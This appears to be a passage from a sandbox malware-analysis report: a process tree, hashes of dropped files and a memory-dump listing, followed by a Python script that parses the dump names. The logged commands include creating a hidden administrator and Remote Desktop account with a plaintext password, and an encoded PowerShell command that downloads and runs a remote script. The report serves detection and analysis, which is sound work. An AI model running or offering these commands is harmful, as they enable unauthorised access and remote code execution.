- Suspicious use of WriteProcessMemory
Depth 4: C:\Windows\system32\cmd.exe
Command line: cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
Depth 5: C:\Windows\system32\net.exe
Command line: net start rdpdr
- Suspicious use of WriteProcessMemory
Depth 6: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 start rdpdr
Depth 3: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- Suspicious use of WriteProcessMemory
Depth 4: C:\Windows\system32\cmd.exe
Command line: cmd /c net start TermService
- Suspicious use of WriteProcessMemory
Depth 5: C:\Windows\system32\net.exe
Command line: net start TermService
- Suspicious use of WriteProcessMemory
Depth 6: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 start TermService
Depth 3: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
Depth 3: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
Depth 2: C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
Depth 3: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc OmWt8GJ5 /add
- Suspicious use of WriteProcessMemory
Depth 2: C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc OmWt8GJ5 /add
- Suspicious use of WriteProcessMemory
Depth 3: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc OmWt8GJ5 /add
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
Depth 2: C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
Depth 3: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
- Suspicious use of WriteProcessMemory
Depth 2: C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
Depth 3: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth 2: C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth 3: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc OmWt8GJ5
Depth 2: C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc OmWt8GJ5
Depth 3: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc OmWt8GJ5
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd.exe /C wmic path win32_VideoController get name
Depth 2: C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic path win32_VideoController get name
- Modifies data under HKEY_USERS
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd.exe /C wmic CPU get NAME
Depth 2: C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic CPU get NAME
Depth 1: C:\Windows\System32\cmd.exe
Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
Depth 2: C:\Windows\system32\cmd.exe
Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\49D.exe
MD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA1
8561c81e8fab7889eb13ab29450bed82878e78c9
SHA256
6a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA512
09e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\49D.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\B0DD.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\B0DD.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\C1E6.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\C1E6.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\RES1FE3.tmpMD5
31207aecdec96ac3cebf834727526f24
SHA18088e931ae64d5f44fd6f1ea67dd124803d92579
SHA2564f2de223fcd3e1b25b5fd23bf4a9ff1935e311f6d047dafccc3af3438c8f60e9
SHA51245e5d1dc9ceb8681cd00889748f7ec5b7a421e0d90d0c6c98bb76e7ab424398865ea13e636624d3fb2ca8c240102acd834d3180287638ae4fb64b65305c00f48
-
C:\Users\Admin\AppData\Local\Temp\RES25DE.tmpMD5
1316e9ada3fc30ae3f4811beaafa6697
SHA11e18cdb9fa4a286f113183f5fff65da23e68bb9b
SHA25604ca498e8e8a9dadc346e1a9b90e043b8163e8d1fb8eefc6bf91703614867342
SHA512288d2fd5d6d6fd2b45f51b833c15a5e92b32c2348f2843bfb81961ccc724cd937d8cfa014c3caf9d9ac2dc57900cb38135534c5a92d9852c57df0627e2abfdf2
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.dllMD5
35071c4bfcf5b09e6cf1f10457e0785a
SHA16381674d14919e11b731864bee67ba632e6c510a
SHA256d21c174b823406a4b84128bbe35f9394031752cceb7801ccc8a2d96063704892
SHA5123bf12aec8b054cc0d92971669fbf782ad0eb55d58dcbed126a7422fa19b910fb32ad2457707878aacbd881ae016c6364baa074ee8684966e92ce9a9c475a42f8
-
C:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.dllMD5
7e258de36259a1ab4f2d9a2f09050f02
SHA173621cf2a77b1fb7401c1cc8efdcdce7452f03d0
SHA25699944f07767d84fe8758eac8458a9cf25a5d4f99f5c1cda88bb48d2ab4e33436
SHA51268b08a7514229162acc988a4ae87fb5033dbf50da89e9c7b19a54e32eaffa19c7397090f46152221e7c56033babbc4260d69518f9ec99a97ff167af4091668e6
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\n4ty3n35\CSCDDE27C93210C430DAAB0D0F2814DD1C5.TMPMD5
6d30b28f1fb56d7f7e7c89b2dd685d61
SHA158861eba96066ad9976d469a84f623adf96386ba
SHA25647626e5602568ef2a4f1cbbcd9bc8d18ae65a42b583391d4225d370923b7f652
SHA51253a622f4338aa782d80d0b3885b1030e2825b611e4741c6ded9092f5cbfc8d1f95e17eca1f32e12c1adf6feecd069cc72dccbc612abc563339a86a9ce73b6d68
-
\??\c:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.cmdlineMD5
da69c6212455ae71b0b3e16f4e308b0b
SHA1fecd3078198b83428c62aaaa0129a91bc2956ec4
SHA2561b79f1d5086429e718838daab6dc0937a2ed449cc279e7e2b5455394acc0c4a2
SHA5123f9e88eddf3286c8e72143a0e714362c415326b12b10450764f4db38925f9a07e5b3e73cd89943f93cb5ba5d26d99feca20dd4b79b88542966eaba681170885c
-
\??\c:\Users\Admin\AppData\Local\Temp\qp0crqtk\CSC45ED1FB13AA1429D92B43D88258E46CE.TMPMD5
894ebc425193250f673d20670b7b6937
SHA1cd9f0a72bed7bafb1e2df2bb3795c7aff78e9138
SHA256c7fe134d3b223a652da58a7e48239a3bd8bd414b395090325619b871e6421d1f
SHA512269c383bef32e7cf9c8464478897b58b887b5cd1231600dda48372f4ce0f596007f4122fc8e370d5dd2ce916765e345fbf0642bd06ad066afbfc886d0515a037
-
\??\c:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.cmdlineMD5
8a32ca540af8aebc854d84365ae4c38f
SHA1799b828911ffc264c2bd4bcdc89a886cef4ba533
SHA2568867d073d1e02693e39b53eb7b2d108678bbc660e329e4f1a9c88fc38a2dd85b
SHA512fc3bd228084f5eeec25b69a53af2ec8098a6d633b5e9f3e3052adfc4a43b69e6d5dc9f812148bbb9db5fcd09608de11aeb23435370bff407bdbdec65cdcc145e
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
- memory/700-397-0x0000000000000000-mapping.dmp
- memory/744-414-0x0000000000000000-mapping.dmp
- memory/1120-350-0x0000000000000000-mapping.dmp
- memory/1164-129-0x0000000004940000-0x0000000004941000-memory.dmp (Filesize 4KB)
- memory/1164-128-0x0000000004900000-0x0000000004901000-memory.dmp (Filesize 4KB)
- memory/1164-127-0x0000000004860000-0x0000000004E66000-memory.dmp (Filesize 6.0MB)
- memory/1164-126-0x00000000049D0000-0x00000000049D1000-memory.dmp (Filesize 4KB)
- memory/1164-125-0x00000000048A0000-0x00000000048A1000-memory.dmp (Filesize 4KB)
- memory/1164-124-0x0000000004E70000-0x0000000004E71000-memory.dmp (Filesize 4KB)
- memory/1164-122-0x00000000000A0000-0x00000000000A1000-memory.dmp (Filesize 4KB)
- memory/1164-119-0x0000000000000000-mapping.dmp
- memory/1264-189-0x000001ED637B0000-0x000001ED637B1000-memory.dmp (Filesize 4KB)
- memory/1264-190-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-150-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-151-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-152-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-153-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-154-0x000001ED62F00000-0x000001ED62F01000-memory.dmp (Filesize 4KB)
- memory/1264-155-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-148-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-158-0x000001ED60DA0000-0x000001ED60DA2000-memory.dmp (Filesize 8KB)
- memory/1264-160-0x000001ED60DA3000-0x000001ED60DA5000-memory.dmp (Filesize 8KB)
- memory/1264-149-0x000001ED48B20000-0x000001ED48B21000-memory.dmp (Filesize 4KB)
- memory/1264-147-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-146-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-167-0x000001ED60DA6000-0x000001ED60DA8000-memory.dmp (Filesize 8KB)
- memory/1264-191-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-145-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-144-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-143-0x0000000000000000-mapping.dmp
- memory/1264-172-0x000001ED60D80000-0x000001ED60D81000-memory.dmp (Filesize 4KB)
- memory/1264-188-0x000001ED63420000-0x000001ED63421000-memory.dmp (Filesize 4KB)
- memory/1264-184-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-183-0x000001ED60DA8000-0x000001ED60DA9000-memory.dmp (Filesize 4KB)
- memory/1264-182-0x000001ED46E30000-0x000001ED46E32000-memory.dmp (Filesize 8KB)
- memory/1264-181-0x000001ED62EA0000-0x000001ED62EA1000-memory.dmp (Filesize 4KB)
- memory/1268-398-0x0000000000000000-mapping.dmp
- memory/1328-413-0x0000000000000000-mapping.dmp
- memory/1412-133-0x0000000000E30000-0x0000000000E75000-memory.dmp (Filesize 276KB)
- memory/1412-130-0x0000000000000000-mapping.dmp
- memory/1468-393-0x0000000000000000-mapping.dmp
- memory/1476-388-0x0000000000000000-mapping.dmp
- memory/1548-404-0x0000000000000000-mapping.dmp
- memory/1684-416-0x0000000000000000-mapping.dmp
- memory/1688-497-0x0000000000000000-mapping.dmp
- memory/1768-405-0x0000000000000000-mapping.dmp
- memory/1776-417-0x0000000000000000-mapping.dmp
- memory/1780-394-0x0000000000000000-mapping.dmp
- memory/1812-207-0x0000022E1C053000-0x0000022E1C055000-memory.dmp (Filesize 8KB)
- memory/1812-199-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-200-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-201-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-202-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-204-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-205-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-206-0x0000022E1C050000-0x0000022E1C052000-memory.dmp (Filesize 8KB)
- memory/1812-198-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-208-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-209-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-211-0x0000022E020E0000-0x0000022E020E2000-memory.dmp (Filesize 8KB)
- memory/1812-215-0x0000022E1C056000-0x0000022E1C058000-memory.dmp (Filesize 8KB)
- memory/1812-197-0x0000000000000000-mapping.dmp
- memory/1940-400-0x0000000000000000-mapping.dmp
- memory/1984-168-0x0000000000000000-mapping.dmp
- memory/2032-164-0x0000000000000000-mapping.dmp
- memory/2136-411-0x0000000000000000-mapping.dmp
- memory/2140-338-0x000002108A396000-0x000002108A398000-memory.dmp (Filesize 8KB)
- memory/2140-304-0x000002108A390000-0x000002108A392000-memory.dmp (Filesize 8KB)
- memory/2140-305-0x000002108A393000-0x000002108A395000-memory.dmp (Filesize 8KB)
- memory/2140-287-0x0000000000000000-mapping.dmp
- memory/2140-339-0x000002108A398000-0x000002108A39A000-memory.dmp (Filesize 8KB)
- memory/2212-403-0x0000000000000000-mapping.dmp
- memory/2216-396-0x0000000000000000-mapping.dmp
- memory/2220-395-0x0000000000000000-mapping.dmp
- memory/2320-174-0x0000000000000000-mapping.dmp
- memory/2504-389-0x0000000000000000-mapping.dmp
- memory/2596-177-0x0000000000000000-mapping.dmp
- memory/2760-117-0x0000000000400000-0x0000000000828000-memory.dmp (Filesize 4.2MB)
- memory/2760-115-0x0000000000030000-0x0000000000038000-memory.dmp (Filesize 32KB)
- memory/2760-116-0x00000000001C0000-0x00000000001C9000-memory.dmp (Filesize 36KB)
- memory/2804-349-0x0000000000000000-mapping.dmp
- memory/2880-118-0x0000000001040000-0x0000000001056000-memory.dmp (Filesize 88KB)
- memory/3004-496-0x0000000000000000-mapping.dmp
- memory/3128-406-0x0000000000000000-mapping.dmp
- memory/3232-410-0x0000000000000000-mapping.dmp
- memory/3428-407-0x0000000000000000-mapping.dmp
- memory/3596-477-0x0000024C768F8000-0x0000024C768F9000-memory.dmp (Filesize 4KB)
- memory/3596-429-0x0000024C768F0000-0x0000024C768F2000-memory.dmp (Filesize 8KB)
- memory/3596-431-0x0000024C768F3000-0x0000024C768F5000-memory.dmp (Filesize 8KB)
- memory/3596-438-0x0000024C768F6000-0x0000024C768F8000-memory.dmp (Filesize 8KB)
- memory/3596-418-0x0000000000000000-mapping.dmp
- memory/3684-399-0x0000000000000000-mapping.dmp
- memory/3756-351-0x0000000000000000-mapping.dmp
- memory/3772-262-0x000002217C576000-0x000002217C578000-memory.dmp (Filesize 8KB)
- memory/3772-260-0x000002217C570000-0x000002217C572000-memory.dmp (Filesize 8KB)
- memory/3772-261-0x000002217C573000-0x000002217C575000-memory.dmp (Filesize 8KB)
- memory/3772-303-0x000002217C578000-0x000002217C57A000-memory.dmp (Filesize 8KB)
- memory/3772-244-0x0000000000000000-mapping.dmp
- memory/3796-412-0x0000000000000000-mapping.dmp
- memory/3812-408-0x0000000000000000-mapping.dmp
- memory/4040-140-0x00000220F6233000-0x00000220F6235000-memory.dmp (Filesize 8KB)
- memory/4040-141-0x00000220F6235000-0x00000220F6236000-memory.dmp (Filesize 4KB)
- memory/4040-139-0x00000220F6230000-0x00000220F6232000-memory.dmp (Filesize 8KB)
- memory/4040-137-0x00000220F6520000-0x00000220F67EF000-memory.dmp (Filesize 2.8MB)
- memory/4040-134-0x0000000000000000-mapping.dmp
- memory/4040-142-0x00000220F6236000-0x00000220F6237000-memory.dmp (Filesize 4KB)
- memory/4064-415-0x0000000000000000-mapping.dmp
- memory/4076-409-0x0000000000000000-mapping.dmp
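The dump names above encode PID, dump sequence number and the region's start and end address, and the report's Filesize is just end minus start. As an added example (not part of the report), the following Python parser turns the names into regions, recomputes the sizes in the report's own units, and ranks the large regions, which is where an analyst looks first for an unpacked payload: the 6.0MB region in 1164, the 4.2MB main-module image at the default 32-bit base in 2760 and the 2.8MB region in 4040 stand out against the 4KB/8KB heap pages everywhere else. The sample lines are copied from the listing; the 256 KiB threshold is an assumption made for the example.

```python
import re

# A subset of the memory-dump names from the listing above (sample input for this example).
SAMPLE_LISTING = """\
memory/1164-127-0x0000000004860000-0x0000000004E66000-memory.dmp
memory/1164-129-0x0000000004940000-0x0000000004941000-memory.dmp
memory/1164-119-0x0000000000000000-mapping.dmp
memory/1412-133-0x0000000000E30000-0x0000000000E75000-memory.dmp
memory/2760-117-0x0000000000400000-0x0000000000828000-memory.dmp
memory/2760-115-0x0000000000030000-0x0000000000038000-memory.dmp
memory/2880-118-0x0000000001040000-0x0000000001056000-memory.dmp
memory/4040-137-0x00000220F6520000-0x00000220F67EF000-memory.dmp
memory/4040-139-0x00000220F6230000-0x00000220F6232000-memory.dmp
"""

NAME_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp|-mapping\.dmp)$"
)
DEFAULT_IMAGE_BASE = 0x400000   # classic 32-bit PE image base


def parse_region(name):
    """Parse one dump name into a dict, or return None for anything that is not one."""
    m = NAME_RE.match(name.strip())
    if not m:
        return None
    start = int(m["start"], 16)
    if m["end"] is None:        # a mapping.dmp is the process map, not a memory region
        return {"pid": int(m["pid"]), "seq": int(m["seq"]), "kind": "mapping",
                "start": start, "end": None, "size": 0}
    end = int(m["end"], 16)
    return {"pid": int(m["pid"]), "seq": int(m["seq"]), "kind": "region",
            "start": start, "end": end, "size": end - start}


def human_size(n):
    """Reproduce the report's units: whole KB below 1 MiB, one-decimal MB above."""
    return f"{n / 1024:.0f}KB" if n < 1 << 20 else f"{n / (1 << 20):.1f}MB"


def parse_listing(text):
    return [r for r in (parse_region(line) for line in text.splitlines()) if r]


def large_regions(regions, threshold=256 * 1024):
    """Regions of at least `threshold` bytes, largest first (the threshold is an assumption)."""
    big = [r for r in regions if r["kind"] == "region" and r["size"] >= threshold]
    return sorted(big, key=lambda r: r["size"], reverse=True)


def describe(region):
    note = " main module image base" if region["start"] == DEFAULT_IMAGE_BASE else ""
    return (f"pid {region['pid']} seq {region['seq']} "
            f"0x{region['start']:X}-0x{region['end']:X} {human_size(region['size'])}{note}")


if __name__ == "__main__":
    for r in large_regions(parse_listing(SAMPLE_LISTING)):
        print(describe(r))
```

Feeding the whole listing through `parse_listing` instead of the subset works the same way; the report's sizes are binary units (0x606000 bytes prints as 6.0MB, not 6.3MB), which the `human_size` helper matches.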